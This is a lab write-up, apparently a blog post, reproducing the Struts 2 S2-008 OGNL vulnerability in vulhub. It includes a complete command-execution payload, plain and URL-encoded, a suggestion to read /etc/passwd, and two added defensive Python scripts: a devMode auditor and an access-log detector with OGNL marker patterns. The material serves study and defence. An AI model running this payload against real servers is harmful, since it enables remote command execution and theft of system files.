CVE-2012-0391 S2-008 reproduction

Posted by shivani.shm on Thu, 02 Dec 2021 05:08:47 +0100

0X00 introduction

The butterfly died on the road and thought hidden by the cloud. Some people work hard and will forget in a few years. Some people are always by their side, whether they live or die--- Liu shisan by Zhang Jiajia

Liu, thirteen. Stay, lose?

Cheng Shuang, in pairs.

Two generations are finally separated, and one mind becomes double--- Zhang Jiajia's "there's a canteen by yunbian"

0X01 environment construction

Target: CentOS Linux 7

Attacker: Windows Server 2016 && Kali

Environment: vulhub

Project address: https://github.com/vulhub/vulhub

To set up vulhub, see: Blank CentOS 7 64-bit vulhub build (detailed)

0X02 vulnerability description

S2-008 covers several vulnerabilities. An incorrect configuration of the Cookie interceptor allows OGNL expressions to be executed, but because most web containers (such as Tomcat) restrict the characters allowed in cookie names, some key characters cannot be used, which makes this vector harder to exploit. Another weak point is that once devMode is enabled in a Struts 2 application, several debugging interfaces can be used to view object information directly or to execute commands. As kxlzx noted, this is almost never the case in a production environment, so it looks like a minor issue, but I don't think that is absolute: once a server has been compromised, an application left running in debug mode could also serve as a backdoor.

Causes of vulnerability:

The root cause is that incoming parameters are not strictly restricted, so malicious code can be executed in several places.

The first case is actually S2-007: OGNL is evaluated during exception handling. The second is the cookie case; although Struts 2 itself does not restrict the malicious code, the Java web server (Tomcat) imposes restrictions on cookie names and processes them before they reach Struts 2, so it is harder to exploit. The third requires devMode (debug mode) to be turned on.

For example, with devMode enabled, appending the parameters ?debug=command&expression=<OGNL expression> to the request causes the OGNL expression to be executed directly.
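Since the devMode vector only exists when struts.devMode is switched on, the first thing a defender checks is the configuration. The following Python audit is an added example (not code from the original post, from vulhub or from the Struts project): it reads a struts.xml or struts.properties, reports whether devMode is enabled, and rewrites the XML with the constant set to false. The sample struts.xml below is constructed for this example; the constant name struts.devMode is the real Struts 2 setting.

```python
"""Audit a Struts 2 configuration for struts.devMode=true (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample: a struts.xml as a developer might leave it before deploying.
SAMPLE_STRUTS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<struts>
    <constant name="struts.devMode" value="true"/>
    <constant name="struts.enable.DynamicMethodInvocation" value="false"/>
    <package name="default" extends="struts-default">
        <action name="index"/>
    </package>
</struts>
"""

DEVMODE_KEY = "struts.devMode"


def devmode_enabled_in_xml(xml_text: str) -> bool:
    """True if struts.xml sets struts.devMode to true.

    When the constant is absent, Struts 2 defaults to devMode=false.
    """
    root = ET.fromstring(xml_text)
    for const in root.iter("constant"):
        if const.get("name") == DEVMODE_KEY:
            return const.get("value", "").strip().lower() == "true"
    return False


def devmode_enabled_in_properties(props_text: str) -> bool:
    """True if struts.properties sets struts.devMode=true (comments and blanks skipped)."""
    for line in props_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, _, value = line.partition("=")
        if key.strip() == DEVMODE_KEY:
            return value.strip().lower() == "true"
    return False


def set_devmode_false(xml_text: str) -> str:
    """Return struts.xml with struts.devMode forced to false (added if missing)."""
    root = ET.fromstring(xml_text)
    found = False
    for const in root.iter("constant"):
        if const.get("name") == DEVMODE_KEY:
            const.set("value", "false")
            found = True
    if not found:
        # Make the safe setting explicit so a later override is easy to spot in review.
        const = ET.SubElement(root, "constant")
        const.set("name", DEVMODE_KEY)
        const.set("value", "false")
        root.insert(0, const)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print("devMode in sample struts.xml:", devmode_enabled_in_xml(SAMPLE_STRUTS_XML))
    hardened = set_devmode_false(SAMPLE_STRUTS_XML)
    print("devMode after hardening:", devmode_enabled_in_xml(hardened))
```

Both files should be checked on a deployed WAR, since the setting can come from either one; a build pipeline can run these functions over the packaged configuration and fail the build when devMode is on.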

Affected version: Struts 2.1.0 - Struts 2.3.1

0X03 - vulnerability reproduction

01 - arbitrary command execution

If the page does not refresh, clear the browser history. whoami is a placeholder and can be replaced, for example with: cat /etc/passwd

payload:

#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()

URL-encoded:

%23%63%6f%6e%74%65%78%74%5b%22%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%22%5d%3d%66%61%6c%73%65%2c%23%66%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%29%2c%23%66%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%66%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%77%68%6f%61%6d%69%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%62%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%61%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%63%2e%72%65%61%64%28%23%64%29%2c%23%67%65%6e%78%6f%72%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%67%65%6e%78%6f%72%2e%70%72%69%6e%74%6c%6e%28%23%64%29%2c%23%67%65%6e%78%6f%72%2e%66%6c%75%73%68%28%29%2c%23%67%65%6e%78%6f%72%2e%63%6c%6f%73%65%28%29

0X04 tool detection

Tool address: https://github.com/Liqunkit/LiqunKit_

0X05 - view log

docker ps #view the container ID
docker exec -it ID /bin/bash #enter the container
cd logs #enter the log directory
cat localhost_access_log.2021-12-02.txt #view the log
exit #exit the container

You can see the payload in the log.
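The access log the post cats out of the container is exactly where these requests leave a trace, so here is an added example (not part of the original post) of a small Python detector for Tomcat access-log lines in the default "common" format. It percent-decodes each query parameter (repeatedly, so double-encoded payloads are not missed), flags debug=command, and looks for the OGNL markers that appear in the payload above. The log lines and the /devmode.action path are constructed for this example.

```python
"""Flag S2-008-style devMode/OGNL requests in a Tomcat access log (added example)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Tomcat "common" access-log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Substrings from the OGNL payload shown above that do not occur in ordinary
# form input. A bare "@" is deliberately left out: it would match e-mail addresses.
OGNL_MARKERS = (
    "#", "_memberAccess", "denyMethodExecution", "@java.", "getRuntime", "ProcessBuilder",
)

# Constructed sample log: one benign page view, one S2-008 attempt, one benign search
# whose value merely contains the word "debug", and one double-encoded attempt.
SAMPLE_LOG = """\
172.17.0.1 - - [02/Dec/2021:04:10:22 +0000] "GET /index.action HTTP/1.1" 200 3412
172.17.0.1 - - [02/Dec/2021:04:11:05 +0000] "GET /devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29 HTTP/1.1" 200 57
172.17.0.1 - - [02/Dec/2021:04:12:40 +0000] "GET /search.action?q=struts+2+debug HTTP/1.1" 200 1200
10.0.0.5 - - [02/Dec/2021:04:13:01 +0000] "GET /devmode.action?debug=command&expression=%2523context HTTP/1.1" 200 12
"""


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %2523 and %23 both end up as '#'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target: str) -> list[str]:
    """Return the reasons a request target looks like S2-008 abuse ([] if clean)."""
    reasons = []
    query = urlsplit(target).query
    # parse_qsl already decodes one layer; decode_fully handles the rest.
    for name, raw_value in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw_value)
        if name.lower() == "debug" and value.lower() == "command":
            reasons.append("devMode debug=command interface requested")
        hits = [m for m in OGNL_MARKERS if m in value]
        if hits:
            reasons.append(f"OGNL markers {hits} in parameter '{name}'")
    return reasons


def scan_access_log(log_text: str) -> list[dict]:
    """Parse each log line and collect the ones whose query string is suspicious."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; a real scanner would count these
        reasons = classify_request(m["target"])
        if reasons:
            findings.append({
                "ip": m["ip"], "time": m["time"], "target": m["target"],
                "status": m["status"], "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["time"], f["status"], f["target"][:60])
        for r in f["reasons"]:
            print("   -", r)
```

Note that the status column is worth keeping in the output: a 200 on a debug=command request with an OGNL expression means the interface answered, not merely that someone probed for it.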

I then thought of viewing the log with the tool, since the working directory when the command is executed is one level above the logs folder.

Pretend you don't know the contents of the logs folder.

Try the command cd logs; ls to view the contents of the logs folder

Fails

Is the command wrong? Try cd logs && ls

Fails

Switch to a white-box approach and find the path of the log file from inside the container

cat ./logs/localhost_access_log.2021-12-02.txt

Viewing it from the shell works

Viewing it with the tool works too:

You can't change a tool

The tool does not seem to support compound commands, but you can view the file by its absolute path

0X06 reference

How Linux executes two commands at the same time, and how to run two or more terminal commands at the same time

Struts 2-008 command execution (CVE-2012-0392)

S2-008 Remote Code Execution Vulnerability

Topics: struts2 cve vulhub